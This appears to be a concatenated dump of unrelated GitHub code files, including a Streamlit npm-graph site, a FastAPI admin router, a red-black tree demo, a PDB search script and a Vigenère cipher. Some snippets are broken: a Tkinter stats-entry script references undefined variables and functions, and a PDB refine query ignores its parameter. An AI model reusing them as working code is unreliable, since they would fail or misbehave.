range(1, 18)] + [len([item for item in number if item >= 18])]\n lst_of_counts_columns = [str(count) for count in range(1, 18)] + ['18+']\n # Write to dataframe\n number_fram = pd.DataFrame([lst_of_counts], columns=lst_of_counts_columns).transpose()\n number_fram = number_fram.rename(columns={0: 'Frequency'})\n number_fram['Number of key occurrences']=number_fram.index\n plotly_chart_most_key_occurrences = px.area(number_fram, y='Frequency',\n x='Number of key occurrences',\n title='Frequency of number of occurrences of keywords')\n plotly_chart_most_key_occurrences.update_layout(width = 1000, height=600)\n st.plotly_chart(plotly_chart_most_key_occurrences)\n\n st.write('''**Takeaway:** most keywords don't catch on, but the more times a keyword is used,\n the more likely it is to get used again in new packages.''')\n\n st.write('''Some other facts about keywords used to describe vertices in our graph:''')\n st.write(f'''\n - There are {len(keywords)} total keywords, and {sum(number)}\n total occurences of keywords throughout our package graph.\n - The Top 25 keywords account for {round(sum(number[-25:])/sum(number) * 100, 2)}% of all occurences of keywords in this graph.\n - {number.count(1)} ({round(number.count(1)/sum(number) * 100, 2)}% of) keywords only occur once throughout the entire graph.''')\n\ndef package_search(package_graph: PackageGraph,\n layout_functions: dict[str, Callable]) -> None:\n \"\"\"\n The package search (application) portion of the web page.\n\n Preconditions:\n - package_graph is the complete Package Graph using the data in big_v2.csv\n \"\"\"\n st.header('Package Search')\n st.write('''This package search feature allows you to visualize the dependency hierarchy for a package as well\n as keyword and maintainer networks. Use the package name dropdown to select a package from database,\n and then use the edge relationship type and the graph type using the other two drop downs search\n fields.''')\n st.write('''\n The color of each node in the graph below indicates the quality of the package. The quality rating is a metric developed\n by npms.io, and measures a variety of factors that may contribute to the package's condition on a scale of 0 to 1.\n If a vertex is colored red, the quality score for the package corresponding to the vertex is less than 0.5\n (a very low quality score). If a vertex is colored yellow, the quality score is greater than or equal to 0.5,\n but less than 0.8. Finally, if a vertex is colored green, the quality score is between 0 and 1 inclusive.\n We developed this color coding system and chose the intervals for each color ourselves. However, the quality\n metric itself is developed and maintained by npms.io, and more info on this particular statistic can be\n found at https://npms.io/about (Note: this link will direct you to a third party website).\n ''')\n # Prompt for package search\n all_packages = package_graph.get_all_packages()\n chosen_package = st.selectbox('Package Name:', all_packages, index=all_packages.index('express'), key='abc')\n\n if package_graph.has_package(chosen_package):\n # Prompt for layout and edge selection\n graph_layout_algo = st.selectbox('Select a graph layout:', list(layout_functions.keys()))\n edge_type = st.selectbox('Select an edge relationship:', ['dependencies', 'maintainers', 'keywords'])\n\n # Dependency info (only if relevant to selections)\n if edge_type == 'dependencies':\n chosen_direct_dependencies = package_graph.get_num_package_direct_dependencies(chosen_package)\n chosen_total_dependencies = package_graph.get_num_dependencies(chosen_package)\n st.write(f'''The package **{chosen_package}** has\n **{chosen_direct_dependencies} direct dependencies** and\n **{chosen_total_dependencies} total dependencies** (which include\n dependencies of dependencies of dependencies...).''')\n\n # Plotly Graph\n plotly_graph = package_graph.get_package_plotly(chosen_package,\n layout_functions[graph_layout_algo],\n edge_type)\n\n # Scale graph to proper width\n plotly_graph.update_layout(width = 1000, height=1000)\n st.plotly_chart(plotly_graph)\n\n # Metadata view\n show_metadata = st.checkbox('Show Package Metadata')\n if show_metadata:\n st.write(f'''**The package {chosen_package} has the following metadata:**''')\n chosen_metadata = package_graph.get_package_metadata(chosen_package)\n # List keywords\n st.write('**Keywords:**')\n _list_package_columns(chosen_metadata['Keywords'], APP_COL_LENGTH,\n lambda column, keyword: column.write(keyword))\n # List all metadata except keywords\n for category in list(chosen_metadata.keys())[1:]:\n if category == 'Downloads Count':\n st.write(f'**{category}:** {int(chosen_metadata[category])}')\n else:\n st.write(f'**{category}:** {chosen_metadata[category]}')\n\n # Spacing\n st.write(' ')\n\n # Dependency view\n show_deps = st.checkbox('Show Dependencies?')\n if show_deps:\n chosen_all_dependencies = package_graph.get_all_dependencies(chosen_package)\n chosen_all_dependencies.remove(chosen_package)\n\n # Only display dependencies when there are dependencies to be displayed\n if len(chosen_all_dependencies) > 0:\n # Process dependencies\n chosen_direct_dependencies = package_graph.get_direct_dependencies(chosen_package)\n\n chosen_indirect_dependencies = [dep for dep in chosen_all_dependencies\n if dep not in chosen_direct_dependencies]\n\n st.write(f'**This package has {len(chosen_all_dependencies)} total dependencies:**')\n st.write(\"NOTE: Clicking any of the links below will direct you to www.npmjs.com (a third party site which may have it's own privacy policy and terms of service agreements, for which we are not responsible).\")\n\n # Direct dependencies\n st.write(f'There are {len(chosen_direct_dependencies)} direct dependencies:')\n _list_package_columns(chosen_direct_dependencies, APP_COL_LENGTH)\n\n # Indiredct dependencies\n st.write(f'And {len(chosen_all_dependencies) - len(chosen_direct_dependencies)} indirect dependencies:')\n _list_package_columns(chosen_indirect_dependencies, APP_COL_LENGTH)\n else:\n st.write(f'{chosen_package} has no dependencies!')\n\n # Spacing\n st.write(' ')\n\n # Maintainer list\n show_maintainers = st.checkbox('Show Packages with Shared Maintainers')\n if show_maintainers:\n chosen_maintainer_share = list(package_graph.get_packages_with_common_maintainers(chosen_package))\n st.write(\"NOTE: Clicking any of the links below will direct you to www.npmjs.com (a third party site which may have it's own privacy policy and terms of service agreements, for which we are not responsible).\")\n st.write(f'''**This package shares at least one\n maintainer with {len(chosen_maintainer_share)} package(s).**''')\n _list_package_columns(chosen_maintainer_share, APP_COL_LENGTH)\n\n\n else:\n st.write('The package you are searching for is not in our database :(')\n\n\ndef _display_npm_link(column, package: str) -> None:\n \"\"\"\n Display a markdown link to the npmjs.com\n page for this package in the specified column.\n \"\"\"\n link = f'[{package}](https://www.npmjs.com/package/{package})'\n column.markdown(link, unsafe_allow_html=True)\n\n\ndef _list_package_columns(lst: list, col_length: int,\n display_func: Callable = _display_npm_link) -> None:\n \"\"\"\n Organize package names in lst as a column list of packages.\n col_length is the number of columns used.\n\n Each package in list is clickable and redirects to the npmjs.com page.\n \"\"\"\n package_per_col = (len(lst) // col_length) + 1\n package_list_columns = st.beta_columns(col_length)\n\n for idx, column in enumerate(package_list_columns):\n for i in range(package_per_col):\n if idx * package_per_col + i < len(lst):\n col_package = lst[idx * package_per_col + i]\n display_func(column, col_package)","repo_name":"danielhocevar/DissectingNPM","sub_path":"site_functions.py","file_name":"site_functions.py","file_ext":"py","file_size_in_byte":15083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40905876699","text":"import logging\nimport os\nfrom typing import Any, Dict, List\n\nfrom hydra.utils import instantiate\nfrom lightning.pytorch.callbacks.callback import Callback\nfrom lightning.pytorch.loggers import Logger, TensorBoardLogger\nfrom omegaconf import OmegaConf\nfrom pkg_resources import resource_filename\nfrom pydantic.utils import deep_update\n\nCONFIG_MAPPER = {\n \"lr\": \"train_lr.yaml\",\n \"bert\": \"train_bert.yaml\",\n \"lstm\": \"train_lstm.yaml\",\n \"deebert\": \"train_deebert.yaml\",\n \"fastbert\": \"train_fastbert.yaml\",\n \"theseusbert\": \"train_theseus_bert.yaml\",\n}\n\n\nclass TrainAssistant(object):\n \"\"\"\n Helper object that holds and instantiate the needed for training.\n\n For every available model for fine-tuning it will load a default configuration that\n can be overwritten by passing some keyword arguments.\n It contains four main sub-configurations:\n\n - *general*: various high level parameters unrelated to the training procedure\n - *train*: training related parameters\n - *model*: parameters necessary to build and define the model\n - *data*: parameters necessary to define the dataset and featurize it\n\n Args:\n name (str):\n name of the base model to fine-tune\n general_kwargs (Dict[str, Any]):\n keyword arguments that can be added or overwrite the default 'general' configuration\n train_kwargs (Dict[str, Any]):\n keyword arguments that can be added or overwrite the default 'train' configuration\n model_kwargs (Dict[str, Any]):\n keyword arguments that can be added or overwrite the default 'model' configuration\n data_kwargs (Dict[str, Any]):\n keyword arguments that can be added or overwrite the default 'data' configuration\n logger_kwargs (Dict[str, Any]):\n keyword arguments that can be added or overwrite the default 'logger' configuration\n callbacks (List[Callback]):\n list of callbacks to use during training\n \"\"\"\n\n def __init__(\n self,\n name: str,\n general_kwargs: Dict[str, Any] = None,\n train_kwargs: Dict[str, Any] = None,\n model_kwargs: Dict[str, Any] = None,\n data_kwargs: Dict[str, Any] = None,\n logger_kwargs: Dict[str, Any] = None,\n callbacks: List[Callback] = None,\n ):\n try:\n conf = OmegaConf.load(\n resource_filename(\n \"bert_squeeze\",\n os.path.join(\"assistants/configs\", CONFIG_MAPPER[name]),\n )\n )\n except KeyError:\n raise ValueError(\n f\"'{name}' is not a valid configuration name, please use one of the following: {CONFIG_MAPPER.keys()}\"\n )\n if (\n data_kwargs is not None\n and data_kwargs.get(\"dataset_config\", {}).get(\"path\") is not None\n ):\n logging.warning(\n \"Found value for `dataset_config.path` which conflicts with parameter `dataset_path`, using\"\n \"value from the later.\"\n )\n\n conf[\"data\"][\"dataset_config\"] = deep_update(\n conf[\"data\"][\"dataset_config\"], data_kwargs[\"dataset_config\"]\n )\n del data_kwargs[\"dataset_config\"]\n\n for name, kws in zip(\n [\"general\", \"train\", \"model\", \"data\", \"logger\", \"callbacks\"],\n [\n general_kwargs,\n train_kwargs,\n model_kwargs,\n data_kwargs,\n logger_kwargs,\n callbacks,\n ],\n ):\n if kws is not None:\n conf[name] = deep_update(conf[name], kws)\n\n self.name = name\n self.general = conf[\"general\"]\n self.train = conf[\"train\"]\n self._model_conf = conf[\"model\"]\n self._data_conf = conf[\"data\"]\n self._logger_conf = conf.get(\"logger\")\n self._callbacks_conf = conf.get(\"callbacks\", [])\n\n self._model = None\n self._data = None\n self._logger = None\n self._callbacks = None\n\n @property\n def model(self) -> Any:\n \"\"\"\"\"\"\n if self._model is None:\n self.model = instantiate(self._model_conf)\n return self._model\n\n @model.setter\n def model(self, value: Any) -> None:\n \"\"\"\"\"\"\n self._model = value\n\n @property\n def data(self) -> Any:\n \"\"\"\"\"\"\n if self._data is None:\n data = instantiate(self._data_conf)\n data.prepare_data()\n data.setup()\n self.data = data\n return self._data\n\n @data.setter\n def data(self, value: Any) -> None:\n \"\"\"\"\"\"\n self._data = value\n\n @property\n def logger(self) -> Logger:\n \"\"\"\"\"\"\n if self._logger is None:\n if self._logger_conf is not None:\n self.logger = instantiate(self._logger_conf)\n else:\n self.logger = TensorBoardLogger(self.general[\"output_dir\"])\n return self._logger\n\n @logger.setter\n def logger(self, value: Logger) -> None:\n \"\"\"\"\"\"\n self._logger = value\n\n @property\n def callbacks(self) -> List[Callback]:\n \"\"\"\"\"\"\n if self._callbacks is None:\n if self._callbacks_conf is not None:\n self.callbacks = [\n instantiate(callback) for callback in self._callbacks_conf\n ]\n else:\n self.callbacks = []\n return self._callbacks\n\n @callbacks.setter\n def callbacks(self, value: List[Callback]) -> None:\n \"\"\"\"\"\"\n self._callbacks = value\n\n def __repr__(self):\n return f\"\"\n\n def __str__(self):\n return f\"TrainAssistant_{self.name}\"\n","repo_name":"JulesBelveze/bert-squeeze","sub_path":"bert_squeeze/assistants/train_assistant.py","file_name":"train_assistant.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"63"} +{"seq_id":"24097653877","text":"import asyncio\nfrom concurrent.futures import ThreadPoolExecutor\nfrom time import time\n\nimport requests\n\nurls = [\"https://nodejs.org/uk/\", \"https://www.python.org/\", \"https://faker.readthedocs.io/\", \"https://github.com/\",\n \"https://goit.global/ua/\"]\n\n\ndef get_url_info(url):\n r = requests.get(url)\n return url, r.text[:50]\n\n\nasync def get_url_info_async(urls):\n loop = asyncio.get_running_loop()\n with ThreadPoolExecutor(5) as executor:\n futures = [loop.run_in_executor(executor, get_url_info, url) for url in urls]\n r = await asyncio.gather(*futures)\n return r\n\nif __name__ == '__main__':\n start = time()\n results = [get_url_info(url) for url in urls]\n print(results)\n print(time() - start)\n print(\"------------\")\n start = time()\n results = asyncio.run(get_url_info_async(urls))\n print(results)\n print(time() - start)","repo_name":"GoIT-Python-Web/Py7Web","sub_path":"m06_01/10_io_task.py","file_name":"10_io_task.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7254428540","text":"from fastapi import APIRouter, Depends, status, Query, HTTPException\nfrom models.models import *\nfrom services.AuthService import *\nfrom configs.environment import get_environment_variables\nfrom .auth import get_current_user\n\nenv = get_environment_variables()\n\nAdminRouter = APIRouter(prefix=f\"/{env.API_VERSION}/admin\", tags=[\"admin\"])\n\n\n@AdminRouter.post(\"/signup\")\nasync def register(user: AdminUser_PydanticIn):\n user_info = user.dict()\n user_info[\"password\"] = get_hash_password(user_info[\"password\"])\n user_obj = await AdminUser.create(**user_info)\n new_user = await AdminUser_Pydantic.from_tortoise_orm(user_obj)\n print(new_user)\n return {\n \"status\": \"ok\",\n \"data\": f\"User is created with username {new_user.username}\",\n }\n\n\n@AdminRouter.post(\"/login\")\nasync def user_login(user: AdminUser_PydanticIn = Depends(get_current_user)):\n admin_user = await AdminUser.get(id=user.id)\n return {\n \"status\": \"ok\",\n \"data\": {\n \"user_id\": admin_user.id,\n \"username\": admin_user.username,\n \"email\": admin_user.email,\n \"created_at\": admin_user.created_at.strftime(\"%Y-%m-%d %H:%M:%S\"),\n },\n }\n","repo_name":"waysiPire0/ecommerceAdminFastApi","sub_path":"routers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"42854988823","text":"# from RBTreeNode import RBTreeNode\nfrom RBTree import RBTree\nimport random\n\ndef inorder_traversal(root):\n if root == RBTree.TNIL:\n return \n inorder_traversal(root.left)\n print('{}: {}'.format(root.val, 'R' if root.isRed else 'B'))\n inorder_traversal(root.right)\n\n# slightly modified version of the algorithm by https://stackoverflow.com/users/4237254/bck\n# which is a stand alone version of the algorithm by https://stackoverflow.com/users/1143396/j-v\n# copypasta'd from https://stackoverflow.com/questions/34012886\ndef print_tree(root, val=\"val\", left=\"left\", right=\"right\"):\n def display(root, val=val, left=left, right=right):\n \"\"\"Returns list of strings, width, height, and horizontal coordinate of the root.\"\"\"\n # No child.\n if root.right is RBTree.TNIL and root.left is RBTree.TNIL:\n line = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n width = len(line)\n height = 1\n middle = width // 2\n return [line], width, height, middle\n\n # Only left child.\n if root.right is RBTree.TNIL:\n lines, n, p, x = display(root.left)\n s = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n u = len(s)\n first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s\n second_line = x * ' ' + '/' + (n - x - 1 + u) * ' '\n shifted_lines = [line + u * ' ' for line in lines]\n return [first_line, second_line] + shifted_lines, n + u, p + 2, n + u // 2\n\n # Only right child.\n if root.left is RBTree.TNIL:\n lines, n, p, x = display(root.right)\n s = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n u = len(s)\n first_line = s + x * '_' + (n - x) * ' '\n second_line = (u + x) * ' ' + '\\\\' + (n - x - 1) * ' '\n shifted_lines = [u * ' ' + line for line in lines]\n return [first_line, second_line] + shifted_lines, n + u, p + 2, u // 2\n\n # Two children.\n left, n, p, x = display(root.left)\n right, m, q, y = display(root.right)\n s = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n u = len(s)\n first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s + y * '_' + (m - y) * ' '\n second_line = x * ' ' + '/' + (n - x - 1 + u + y) * ' ' + '\\\\' + (m - y - 1) * ' '\n if p < q:\n left += [n * ' '] * (q - p)\n elif q < p:\n right += [m * ' '] * (p - q)\n zipped_lines = zip(left, right)\n lines = [first_line, second_line] + [a + u * ' ' + b for a, b in zipped_lines]\n return lines, n + m + u, max(p, q) + 2, n + u // 2\n\n lines, *_ = display(root, val, left, right)\n for line in lines:\n print(line)\n\nif __name__== '__main__':\n rbtree = RBTree()\n nums = list(range(16, 32))\n random.shuffle(nums)\n for val in nums:\n rbtree.insert(val)\n print('Generated Tree:')\n print('Minimum: {}, Maximum:{}'.format(rbtree.minimum(rbtree.root).val, rbtree.maximum(rbtree.root).val))\n print_tree(rbtree.root)\n \n to_delete = []\n l = list(range(len(nums)))\n for i in range(3):\n index = random.choice(l)\n l.remove(index)\n to_delete.append(nums[index])\n\n for i in to_delete:\n s = rbtree.successor(i).val if rbtree.successor(i) is not None else None\n p = rbtree.predecessor(i).val if rbtree.predecessor(i) is not None else None\n print('\\nSuccessor({}) = {}'.format(i, s))\n print('Predecessor({}) = {}'.format(i, p))\n rbtree.delete(i)\n print('Tree state after Delete({}):\\n'.format(i))\n print_tree(rbtree.root)","repo_name":"mdmn07C5/RedBlackTree","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25371936310","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis program/module facilitates posting queries to the RCSB Protein databank.\nThe script is currently limited to perform searches on ligand name. An\noptional argument can be provided as similarity cutoff to exclude \nhomologous proteins. The PDB structures found are automatically downloaded.\n\nUsage:\n pdbsearch.py ligand [cutoff]\n\nTODO:\n This program/module will be extended in the near future to\n\n #. bring more of the PDB search facilities to the command-line\n #. provide a full command-line interface for searching/listing/downloading\n\"\"\"\n\n__author__ = 'Tsjerk A. Wassenaar'\n__copyright__ = 'Copyright 2018, University of Groningen'\n__version__ = '0.1.0dev0'\n__license__ = 'Apache License 2.0'\n\n\n## IMPORTS\n\nimport sys\nfrom urllib.error import HTTPError\nimport urllib.request as urllib\n\n\n## CONSTANTS\n\nPDB = 'http://www.rcsb.org/pdb/'\nPDBREST = PDB + 'rest/search'\nPDBDOWN = PDB + 'download/downloadFile.do?fileFormat=pdb&compression=NO&structureId='\n\nPDBREFINE = \"\"\"\n \n {level}\n {conjunction}\n \n {query}\n \n \n\"\"\"\n\n\n## CLASSES\n \nclass PDBQuery:\n def __init__(self, query=None):\n self.ids = []\n self.query = []\n if query:\n self.query = [\"or\", query]\n \n def __and__(self, other):\n out = PDBQuery()\n out.query = self.query + ['and'] + other.query[1:]\n return out\n \n def __or__(self, other):\n out = PDBQuery()\n out.query = self.query + ['or'] + other.query[1:]\n return out\n\n def __str__(self):\n level = 0\n out = ['']\n querit = iter(self.query)\n for item in querit:\n conjunction = item\n query = \"\\n \".join(next(querit).split(\"\\n\"))\n out.append(PDBREFINE.format(**locals()))\n level += 1\n out.append('')\n return \"\\n\".join(out)\n \n def search(self):\n f = urllib.urlopen(PDBREST, data=str(self).encode('utf-8'))\n self.ids = [ item.decode('utf-8') for item in f.read().split() ]\n if self.ids:\n print(\"Found number of PDB entries:\", len(self.ids))\n return self.ids\n print(\"Failed to retrieve results\")\n return None\n \n def download(self):\n if not self.ids:\n self.search()\n for pdbid in self.ids:\n try:\n print(pdbid, end=\" \")\n yield pdbid, urllib.urlopen(PDBDOWN + pdbid).read()\n except HTTPError as e:\n sys.stderr.write(\"Failed retrieving {}:\".format(pdbid))\n sys.stderr.write(e)\n continue\n\n \nclass PDBQ_Ligand(PDBQuery):\n \"\"\"Ligand query for RCSB protein database\"\"\"\n def __init__(self, name, comparator=\"Contains\", polymeric=\"Any\"):\n PDBQuery.__init__(self)\n typ = \"org.pdb.query.simple.ChemCompNameQuery\"\n self.query = [\n \"or\", \n (\n \"{typ}\\n\"\n \"{comparator}\\n\"\n \"{name}\\n\"\n \"{polymeric}\"\n ).format(**locals())\n ]\n\n \nclass PDBQ_Refine(PDBQuery):\n \"\"\"Query for refinement of PDB search result based on level of homology\"\"\"\n def __init__(self, level=90):\n PDBQuery.__init__(self)\n typ = \"org.pdb.query.simple.HomologueReductionQuery\"\n self.query = [\n \"or\",\n (\n \"{typ}\\n\"\n \"90\"\n ).format(**locals())\n ]\n \n\n## FUNCTIONS\n\n\n## MAIN\ndef main(args):\n\n if len(args) < 2:\n ...\n return 1\n\n query = PDBQ_Ligand(args[1])\n if len(args) > 2:\n query |= PDBQ_Refine(int(args[2]))\n \n # Search and download PDB ids matching the query\n # Homology will \n for pdbid, data in query.download():\n open(\"{}.pdb\".format(pdbid), 'wb').write(data)\n\n return 0\n\n\nif __name__ == \"__main__\":\n exco = main(sys.argv)\n sys.exit(exco)\n","repo_name":"Tsjerk/pdbsearch","sub_path":"pdbsearch.py","file_name":"pdbsearch.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"74987415561","text":"import json\nimport numpy as np\nimport pandas as pd\nfrom datetime import date\nfrom joblib import load\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.font as tkFont\nimport os\nfrom functools import partial\nfrom Shot import Player, Shot\nfrom Draw_HS_Court import draw_HS_court\nfrom Player_Entry import player_entry, submit_teams\n\ndef data_entry():\n root = Tk()\n # root.geometry(\"584x643\")\n # root.resizable(width=False, height=False)\n Grid.rowconfigure(root, 0, weight=1)\n Grid.columnconfigure(root, 0, weight=1)\n\n global fig, ax, circle\n global home_points, away_points, home_shots, away_shots, shot_index, home_team, away_team, home_list, away_list\n\n home_points = 0\n away_points = 0\n home_shots = 0\n away_shots = 0\n shot_index = 0\n List = []\n\n team_label_font = tkFont.Font(family='Helvetica', size=20, weight='bold')\n team_entry_font = tkFont.Font(family='Hevetica', size=15)\n button_font = tkFont.Font(family='Hevetica', size=12)\n reg_font = tkFont.Font(family='Hevetica', size=12)\n\n\n team_frame = LabelFrame(root, padx=10, pady=10)\n team_frame.pack(side=TOP, padx=10, pady=10)\n\n home_label = Label(team_frame, text=\"Home\", font=team_label_font)\n away_label = Label(team_frame, text=\"Away\", font=team_label_font)\n\n home_label.grid(row=0, column=0, sticky=N+S+E+W)\n away_label.grid(row=0, column=3, sticky=N+S+E+W)\n\n home_name_label = Label(team_frame, text=home_team, font=team_entry_font)\n away_name_label = Label(team_frame, text=away_team, font=team_entry_font)\n home_name_label.grid(row=1, column=0, padx=(0,20)) # sticky=N+S+E+W)\n away_name_label.grid(row=1, column=3, padx=(20,0)) #, sticky=N+S+E+W)\n\n button_frame = LabelFrame(root)\n button_frame.pack(padx=10, pady=10)\n button1 = Button(button_frame, text='Show Pitch', command=draw_court, font=button_font)\n button1.pack(padx=(5, 50), pady=5, side=LEFT)\n\n save_file_button = Button(button_frame, text='Save Data as .CSV', command=saveCSV, font=button_font)\n save_file_button.pack(padx=(50,5), pady=5, side=RIGHT)\n\n outer = LabelFrame(root)\n outer.pack(padx=10, pady=10)\n\n key = LabelFrame(outer, text=\"Key\", font=reg_font)\n key.pack(side=LEFT)\n key_text1 = Label(key, text=\"Shot Made: LClick (Orange)\", font=reg_font)\n key_text2 = Label(key, text=\"Shot Missed: RClick (Blue)\", font=reg_font)\n key_text1.pack(fill=BOTH, expand=YES)\n key_text2.pack(fill=BOTH, expand=YES)\n\n scoreboard = LabelFrame(outer, text=\"Game Scoreboard\", font=reg_font)\n scoreboard.pack(side=RIGHT)\n scoreboard_home = Label(scoreboard, text=\"Home\", font=reg_font)\n scoreboard_away = Label(scoreboard, text=\"Away\", font=reg_font)\n shots_label = Label(scoreboard, text=\"Shots: \", font=reg_font)\n score_frame1 = LabelFrame(scoreboard)\n score_frame2 = LabelFrame(scoreboard)\n score_home_label = Label(score_frame1, text=str(home_goals), font=reg_font)\n score_away_label = Label(score_frame2, text=str(away_goals), font=reg_font)\n shots_home_label = Label(scoreboard, text=str(home_shots), font=reg_font)\n shots_away_label = Label(scoreboard, text=str(away_shots), font=reg_font)\n SOT_label = Label(scoreboard, text=\"SOT: \", font=reg_font)\n SOT_home_label = Label(scoreboard, text=str(home_SOT), font=reg_font)\n SOT_away_label = Label(scoreboard, text=str(away_SOT), font=reg_font)\n scoreboard_home.grid(row=0, column=1)\n scoreboard_away.grid(row=0, column=2)\n score_frame1.grid(row=1, column=1)\n score_frame2.grid(row=1, column=2)\n score_home_label.pack()\n score_away_label.pack()\n shots_label.grid(row=2, column=0)\n shots_home_label.grid(row=2, column=1)\n shots_away_label.grid(row=2, column=2)\n SOT_label.grid(row=3, column=0)\n SOT_home_label.grid(row=3, column=1)\n SOT_away_label.grid(row=3, column=2)\n \n root.mainloop()\n \n \nif __name__ == '__main__':\n home_team, away_team, home_list, away_list = player_entry()\n data_entry()\n ","repo_name":"yumamoto164/Basketball-StatsKeeper","sub_path":".ipynb_checkpoints/Data_Entry-checkpoint.py","file_name":"Data_Entry-checkpoint.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40572892277","text":"from blacksheep import Application\nfrom blacksheep import Application\nfrom blacksheep.server.openapi.v3 import OpenAPIHandler\nfrom openapidocs.v3 import Info\nfrom app import *\n\nimport os\n\nif not os.path.exists(\"static\"):\n os.mkdir(\"static\")\n\nif not os.path.exists(\"static/brand\"):\n os.mkdir(\"static/brand\")\n\nif not os.path.exists(\"static/subcategory\"):\n os.mkdir(\"static/subcategory\")\n\napp = Application()\n\napp.serve_files(\"static\")\n\napp.use_cors(\n allow_methods=\"*\",\n allow_origins=\"*\",\n allow_headers=\"*\",\n max_age=300,\n)\n\ndocs = OpenAPIHandler(info=Info(title=\"Example API\", version=\"0.0.1\"))\ndocs.bind_app(app)\n","repo_name":"David2005-15/butique","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43324415344","text":"N, S = map(int, input().split())\n\nbox = list(map(int, input().split()))\n\nResult = 0\nFlag = False\n\n\ndef cal(Sum, Index, F):\n global N, S, box, Flag\n if Index >= N:\n return\n\n sub_sum = Sum + box[Index]\n if sub_sum == S:\n global Result\n Result += 1\n\n cal(sub_sum, Index+1, Flag)\n cal(Sum, Index+1, Flag)\n\n return\n\n\ncal(0, 0, Flag)\n\nprint(Result)\n","repo_name":"leed21542/Algorithm","sub_path":"백준/스택/1725 히스토그램.py","file_name":"1725 히스토그램.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16707196218","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom ...language import Language\nfrom ...attrs import LANG\nfrom ...fr.language_data import get_tokenizer_exceptions, STOP_WORDS\nfrom ...language_data.punctuation import TOKENIZER_INFIXES, ALPHA\n\nimport pytest\n\n\n@pytest.fixture\ndef fr_tokenizer_w_infix():\n SPLIT_INFIX = r'(?<=[{a}]\\')(?=[{a}])'.format(a=ALPHA)\n\n # create new Language subclass to add to default infixes\n class French(Language):\n lang = 'fr'\n\n class Defaults(Language.Defaults):\n lex_attr_getters = dict(Language.Defaults.lex_attr_getters)\n lex_attr_getters[LANG] = lambda text: 'fr'\n tokenizer_exceptions = get_tokenizer_exceptions()\n stop_words = STOP_WORDS\n infixes = TOKENIZER_INFIXES + [SPLIT_INFIX]\n\n return French.Defaults.create_tokenizer()\n\n\n@pytest.mark.parametrize('text,expected_tokens', [(\"l'avion\", [\"l'\", \"avion\"]),\n (\"j'ai\", [\"j'\", \"ai\"])])\ndef test_issue768(fr_tokenizer_w_infix, text, expected_tokens):\n \"\"\"Allow zero-width 'infix' token during the tokenization process.\"\"\"\n tokens = fr_tokenizer_w_infix(text)\n assert len(tokens) == 2\n assert [t.text for t in tokens] == expected_tokens\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/19200_test_issue768.py","file_name":"19200_test_issue768.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"3966917675","text":"# Author: s0lst1c3\n# Description: Simple implementation of the vigenere ciphere\n\nimport random\nfrom sanitizer import sanitize\nfrom string import lowercase\n\nrandom.seed()\n\nOFFSET = ord('a')\n\ndef gen(keysize):\n return ''.join(random.sample(lowercase, keysize))\n\ndef enc(m, k):\n m = sanitize(m)\n c = []\n k_len = len(k)\n\n for i in xrange(0, len(m)):\n c.append(chr((ord(m[i])-OFFSET+ord(k[i%k_len])-OFFSET)%26+OFFSET))\n\n return ''.join(c)\n\ndef dec(c, k):\n m = [] \n k_len = len(k)\n\n for i in xrange(0, len(c)):\n m.append(chr(((ord(c[i])-OFFSET)-(ord(k[i%k_len])-OFFSET))%26+OFFSET))\n\n return ''.join(m)\n\n","repo_name":"s0lst1c3/basic-ciphers","sub_path":"python/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16793765798","text":"from PyQt5.QtCore import pyqtSlot, pyqtSignal, QTimer, Qt, QSize\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QLabel, QSizePolicy\n\nfrom qutebrowser.config import config\nfrom qutebrowser.utils import usertypes\n\n\nclass Message(QLabel):\n\n \"\"\"A single error/warning/info message.\"\"\"\n\n def __init__(self, level, text, replace, parent=None):\n super().__init__(text, parent)\n self.replace = replace\n self.setAttribute(Qt.WA_StyledBackground, True)\n stylesheet = \"\"\"\n padding-top: 2px;\n padding-bottom: 2px;\n \"\"\"\n if level == usertypes.MessageLevel.error:\n stylesheet += \"\"\"\n background-color: {{ conf.colors.messages.error.bg }};\n color: {{ conf.colors.messages.error.fg }};\n font: {{ conf.fonts.messages.error }};\n border-bottom: 1px solid {{ conf.colors.messages.error.border }};\n \"\"\"\n elif level == usertypes.MessageLevel.warning:\n stylesheet += \"\"\"\n background-color: {{ conf.colors.messages.warning.bg }};\n color: {{ conf.colors.messages.warning.fg }};\n font: {{ conf.fonts.messages.warning }};\n 